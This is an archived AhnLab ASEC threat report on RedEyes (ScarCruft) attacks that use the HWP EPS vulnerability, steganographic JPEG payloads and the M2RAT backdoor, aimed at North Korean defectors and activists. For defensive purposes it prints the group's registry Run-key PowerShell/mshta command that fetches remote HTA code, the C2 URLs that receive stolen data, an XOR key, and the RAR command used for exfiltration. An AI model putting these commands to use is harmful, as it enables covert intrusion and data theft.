{ "id": "3aaa7873-8310-4ed5-adf8-fcd6d4a1822e", "created_at": "2026-04-06T00:15:56.210502Z", "updated_at": "2026-04-10T03:38:06.667332Z", "deleted_at": null, "sha1_hash": "5c7412f41750686d04fcdc582d97efff5b043a5b", "title": "HWP Malware Using the Steganography Technique: RedEyes (ScarCruft) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1797861, "plain_text": "HWP Malware Using the Steganography Technique: RedEyes\r\n(ScarCruft) - ASEC\r\nBy ATCP\r\nPublished: 2023-02-13 · Archived: 2026-04-05 14:42:55 UTC\r\nIn January, the ASEC (AhnLab Security Emergency response Center) analysis team discovered that the RedEyes threat\r\ngroup (also known as APT37, ScarCruft) had been distributing malware by exploiting the HWP EPS (Encapsulated\r\nPostScript) vulnerability (CVE-2017-8291). This report will share the RedEyes group’s latest activity in Korea.\r\n1. Overview\r\nThe RedEyes group is known for targeting specific individuals and not corporations, stealing not only personal PC\r\ninformation but also the mobile phone data of their targets. A distinct characteristic of the latest RedEyes group attack\r\nis the fact that they exploited the HWP EPS vulnerability using the steganography technique to distribute their\r\nmalware.\r\nThe HWP EPS vulnerability used in the attacks is an old vulnerability that has already been patched in the latest\r\nversion of the Hangul Word Processor. We assume that the threat actor initiated their attacks after checking in advance\r\nif their targets (individuals) were using an older version of HWP that supports EPS. Furthermore, there is a confirmed\r\npast case where the RedEyes group used the steganography technique to distribute malware. In 2019, Kaspersky shared\r\na report saying that the ScarCruft (RedEyes) group’s downloader used the steganography technique to download\r\nadditional malware.\r\nThe usage of the steganography technique to download malware and the RUN key command for autorun registration to\r\nestablish a consistent connection with the C\u0026C server being similar to the format used by the RedEye group in the past\r\nare the reasons why we believe they had done this attack.\r\nThe RedEyes group is also known for using Powershell and the Chinotto malware to steal PC information and remote\r\ncontrol systems. However, a new malware strain was found in the latest attack which, unlike Chinotto, uses the shared\r\nmemory section to carry out C\u0026C commands.\r\nRegarding the newly identified malware, the ASEC analysis team named it M2RAT (Map2RAT) after the name found\r\nin the shared memory section.\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 1 of 14\n\nThis report covers the TTPs (Tactics, Techniques, and Procedures) of the RedEyes group’s initial access, defense\r\nevasion, persistence, and the newly identified M2RAT’s latest command control and exfiltration.\r\n2. Analysis\r\n2.1. Initial Access\r\nOn January 13, an HWP EPS vulnerability (CVE-2017-8291) attack involving the usage of the filename “Form.hwp”\r\nwas discovered by AhnLab’s ASD (AhnLab Smart Defense). The HWP document was not collected at the time of the\r\nanalysis, but we were able to procure the EPS file that triggered the aforementioned vulnerability.\r\nEPS is a type of graphic format that uses the PostScript programming language by Adobe to show graphics. High-resolution vector images can be shown through EPS and the Hangul Word Processor supported a third-party module\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 2 of 14\n\n(ghostscript) to process EPS files. However, due to an increase in malicious EPS vulnerability exploitations, such as\r\nAPT attacks, Hancom has removed the third-party EPS processing module.\r\nAdditionally, the ASEC analysis team posted a detailed analysis report on the CVE-2017-8291 vulnerability back in\r\n2019.\r\nThe “Form.hwp” file includes a vulnerable EPS file (CVE-2017-8291) which is shown in Figure 4. When the user\r\nopens the file (“Form.hwp”), the vulnerability allows the threat actor’s shellcode to run through the third-party module.\r\nThe shellcode downloads an image file (JPEG) from the threat actor’s server (C\u0026C) and decrypts the encoded PE file\r\ncontained within the image file. Afterward, it creates the PE file in the %temp% path before executing it.\r\n2.2. Defense Evasion\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 3 of 14\n\nThe shellcode downloaded an image file from the threat actor’s server and executed an additional piece of malware. In\r\nother words, the threat actor used the steganography technique to embed a malware strain within an image. We assume\r\nthat this was done to evade network detection. It appears that the steganography image file used by the threat actor was\r\nobtained from a wallpaper-sharing website called “wallup.net”.\r\nThe image file consists of a normal JPEG header, the meta data required for decoding the PE file (XOR key and file\r\nsize), and the encoded PE file.\r\nA 16-byte XOR key is used for PE decoding to XOR 1 byte at a time.\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 4 of 14\n\n16-byte xor key : FD DD 28 F5 7C 48 8E 7E 0C E0 17 77 35 87 3B 49\r\n(0xFD xor 0xB0) = 0x4D (M)\r\n(0xDD xor 0x87) = 0x5A (Z)\r\n(0x28 xor 0xB8) = 0x90\r\n(0xF5 xor 0xF5) = 0x00\r\n(* MZ is the signature of the PE file.)\r\nThe ultimately decoded PE file is created and executed under the name lskdjfel.exe in the %temp% path. The executed\r\nPE file is responsible for downloading an additional backdoor malware (M2RAT), injecting it into explorer.exe, and\r\nadding both Powershell and mshta commands to the autorun registry Run key to establish a persistent connection with\r\nthe threat actor’s server.\r\n2.3. Persistence\r\nThe executed lskdjfel.exe file registers the following command to the registry Run key to establish a persistent\r\nconnection with the threat actor’s server.\r\nRegistry key path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: RyPO\r\nValue: c:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep\r\nbypass ping -n 1 -w 340328 2.2.2.2 || mshta hxxps://www.*****elearning.or[.]kr/popup/handle/1.html\r\nThe command registered to the registry Run key was found to be similar to that of the ScarCruft (RedEyes) group\r\nreport published by Kaspersky in 2021.\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 5 of 14\n\n[ScarCruft’s registry Run key command in 2021 (by Kaspersky)]\r\nc:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass\r\nping -n 1 -w 300000 2.2.2.2 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html\r\n[RedEyes (ScarCruft) registry Run key command in 2023]\r\nc:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass\r\nping -n 1 -w 340328 2.2.2.2 || mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html\r\nWhenever the affected host PC is booted up, the registry key causes Powershell and the normal Windows utility, mshta,\r\nto also be executed. At the time of analysis, an HTA (HTML Application) file containing a JS (JavaScript) code was\r\ncollected from the “1.html” file that mshta had downloaded from the threat actor’s server.\r\nThe JS code is responsible for executing the Powershell command, which receives and executes commands from the\r\nthreat actor’s server, and returns the results.\r\nWhen the Powershell adds a “U” parameter to the threat actor’s server address when transmitting the computer name\r\nand username, the threat actor’s server encodes the CMD command that is going to be executed in BASE64 before\r\nsending it to the affected host. The encoded BASE64 command is then decoded by Powershell and executed. The result\r\nof the command is saved as a file in the %temp%\\vnGhazwFiPgQ path. Afterward, an “R” parameter is added to the\r\nthreat actor’s server which then encodes the command execution result in BASE64 before sending it.\r\nhxxps://www.*******elearning.or[.]kr/popup/handle/log.php?U=[Computer Name]+[Username] // Receive\r\nthe threat actor’s command\r\nhxxps://www.*******elearning.or[.]kr/popup/handle/log.php?R=[BASE64-encoded] // Send command\r\nexecution result\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 6 of 14\n\n2.4. M2RAT (Map2RAT)\r\nThe ultimately executed backdoor operates after being injected into explorer.exe. The main features of this backdoor\r\nare similar to those of basic remote control malware, which include keylogging, data leakage (files and recordings),\r\nrunning or terminating processes, and capturing screenshots.\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 7 of 14\n\nHowever, the recently discovered backdoor has a different command system compared to the previously identified\r\nChinotto malware. It does not save the keylogging data or screenshot logs in the affected system but instead sends them\r\nto the threat actor’s server, leaving no traces of the stolen data in the affected system.\r\nThe ASEC analysis team named this newly identified malware M2RAT (Map2RAT) after the common name within the\r\nshared memory section used during C\u0026C communication.\r\nFileInputMap2\r\nProcessInputMap2\r\nCaptureInputMap2\r\nRawInputMap2\r\nRegistryModuleInputMap2\r\nTypingRecordInputMap2\r\nUsbCheckingInputMap2\r\n2.4.1. Command and Control of M2RAT\r\nM2RAT’s C\u0026C communications command system involves receiving commands from the threat actor’s server through\r\nthe POST method’s Body. The meaning of these command can be found in the below Table 1.\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 8 of 14\n\nC\u0026C\r\nCommand\r\nDescription\r\nOKR Command received upon initial connection with C\u0026C communications\r\nURL Edits the registry key value to update the C\u0026C\r\nUPD Updates the currently connected C\u0026C\r\nRES Ends C\u0026C connection (End M2RAT)\r\nUNI Ends C\u0026C connection (End M2RAT)\r\nCMD\r\nPerforms remote control commands (Keylogging and process\r\ncreation/execution)\r\nTable 1. Description of threat actor’s commands\r\nM2RAT’s threat actor server manages hosts with MAC addresses in order to distinguish affected hosts. When infected\r\nwith M2RAT, the MAC address is encoded (XOR) with 0x5c and saved in the “HKCU\\Software\\OneDriver” path’s\r\n“Version” value. The encoded MAC address value is used to distinguish affected hosts in the threat actor’s server.\r\nRegistry key path: HKCU\\Software\\OneDriver\r\nValue name: Version\r\nValue: Value that XOR-encoded (0x5c) MAC address of the affected host\r\nThe result value of the command sent by the threat actor to the affected host is saved in the “_Encoded MAC Address\r\nValue_2” folder of the threat actor’s server. The screenshots taken by M2RAT from the affected host are saved in the\r\n“_Encoded MAC Address Value_cap” folder. (Refer to Figure 12)\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 9 of 14\n\nAdditionally, M2RAT XOR encodes with 0x5c and saves the threat actor’s server address info in the “Property” value\r\nof the same registry key path as the MAC address.\r\nRegistry key path: HKCU\\Software\\OneDriver\r\nValue name: Property\r\nValue: Value that XOR-encoded (0x5c) threat actor’s server address\r\nIn the future, the threat actor can transmit the “URL” and “UPD” commands to M2RAT to update their server address\r\n(Refer to Table 1). The “URL” command is used to update the registry key with a new address and the “UPD”\r\ncommand is used to change the threat actor’s address defined in the currently running instance of M2RAT.\r\nThe remote control command of M2RAT is established by transmitting CMD commands from the threat actor’s server.\r\nThe Chinotto malware, which was confirmed to have been used by the RedEyes group in the past, executed remote\r\ncontrol commands through the Query String method, but M2RAT creates a shared memory section to execute the\r\ncommands from the threat actor’s server. Like the threat actor’s use of the steganography technique in the initial breach\r\nstage, this appears to also be for the purpose of evading network detection by hiding the command info in the Body of\r\nthe POST.\r\n(* Query String: A string that starts with a question mark at the end of a URL)\r\nThe CMD command is transmitted through the shared memory. The memory section name info is shown below in\r\nTable 2.\r\nSection Name Feature\r\nRegistryModuleInputMap2\r\nTransmits additional module execution results (e.g. Mobile phone\r\ndata leak module)\r\nFileInputMap2 Explores drives (A:\\ – Z:\\), create/write files, and changes file time\r\nCaptureInputMap2 Screenshots the current screen of the affected host’s PC\r\nProcessInputMap2 Checks the process list, create/terminate processes\r\nRawInputMap2 Use ShellExectueExW API to run process\r\nTypingRecordInputMap2 Leaks keylogging data\r\nUsbCheckingInputMap2\r\nUSB data leak\r\n(hwp, doc, docx, xls, xlsx, ppt, pptx, cell, csv, show, hsdt, mp3, amr,\r\n3gp, m4a, txt, png, jpg, jpeg, gif, pdf, eml)\r\nTable 2. Features of the shared memory section\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 10 of 14\n\n2.4.2. Exfiltration\r\nM2RAT’s exfiltration features include screenshots of the affected host’s screen, process information, keylogging\r\ninformation, and data (documents and voice files) leaks. In the case of screenshots, they are taken regularly even if a\r\ncommand is not given by the threat actor. They are then sent to the threat actor’s server where they are saved as\r\n“result_[number]” in the “_Encoded MAC Address Value_cap” folder.\r\nThe remaining data leaks are saved in the “_Encoded MAC Address Value_2” folder.\r\nIf there are documents or voice recordings with sensitive data in removable storage devices or shared folders, then\r\nthese are copied into the %TEMP% path, compressed into a password-protected file with Winrar (RAR.exe), and the\r\nresults are then transmitted to the threat actor’s server.\r\nFolder path where data is copied to: %Temp%\\Y_%m_%d_%H_%M_%S // (e.g. %TEMP%\\Year_Month_Date\r\n_Hour_Minute_Second)\r\nFile extensions: hwp, doc, docx, xls, xlsx, ppt, pptx, cell, csv, show, hsdt, mp3, amr, 3gp, m4a, txt, png, jpg,\r\njpeg, gif, pdf, eml\r\nThe RAR.exe options that are used are as follows. The path the compressed file is created into is the same as the\r\n%TEMP% folder path.\r\na -df -r -hp dgefiue389d@39r#1Ud -m1 “Compressed file creation path” “Compression target path”\r\nOption Name Description\r\na Compress\r\ndf Delete file after compression\r\nr Recover compressed file\r\nhp Encrypt file data and header\r\nm Set compression level\r\nTable 3. Explanation of RAR compression options\r\nThe ASEC analysis team was also able to uncover through the ASD (AhnLab Smart Defense) infrastructure an\r\nInfostealer communicating with M2RAT. This malware was identified as a .NET file that steals files saved on mobile\r\nphones and sends them to the RegistryModuleResultMap2 shared memory section of M2RAT.\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 11 of 14\n\nhttps://asec.ahnlab.com/en/48063/\r\nPage 12 of 14\n\nThe .NET file’s PDB info is as follows.\r\nPDB :\r\nE:\\MyWork\\PhoneDataCp\\PhoneDeviceManager\\PhoneDeviceManager\\obj\\x86\\Release\\PhoneDeviceManager.pdb\r\n3. Conclusion\r\nThe RedEyes group is an APT hacking organization that is supported on a national level. They are known to attack\r\nindividual targets such as human rights activists, reporters, and North Korean defects. Their aim appears to be\r\nexfilitration. Defending against such APT attacks is an extremely complicated process. Especially since the RedEyes\r\ngroup is known to target individuals instead of corporations. It is difficult for individuals to even realize they have been\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 13 of 14\n\naffected. The ASEC analysis team is closely tracking this group. Should a new TTPs be found from this threat actor, we\r\nwill quickly share the details as we did in this blog post to contribute towards minimizing damage.\r\n4. References\r\nscarcruft-surveilling-north-korean-defectors-and-human-rights-activists – Kaspersky\r\nTTPs #9: Analysis of Attack Strategies that Monitor Daily Lives of Individuals -KrCert/CC\r\nTTPs $ ScarCruft Tracking Note – KrCert/CC\r\n“Ghost” Hidden In HWP Files (This report supports Korean only for now.) – ASEC Analysis Team\r\nMD5\r\n4488c709970833b5043c0b0ea2ec9fa9\r\n7bab405fbc6af65680443ae95c30595d\r\n7f5a72be826ea2fe5f11a16da0178e54\r\n8b666fc04af6de45c804d973583c76e0\r\n9083c1ff01ad8fabbcd8af1b63b77e66\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/48063/\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://asec.ahnlab.com/en/48063/" ], "report_names": [ "48063" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434556, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5c7412f41750686d04fcdc582d97efff5b043a5b.pdf", "text": "https://archive.orkl.eu/5c7412f41750686d04fcdc582d97efff5b043a5b.txt", "img": "https://archive.orkl.eu/5c7412f41750686d04fcdc582d97efff5b043a5b.jpg" } }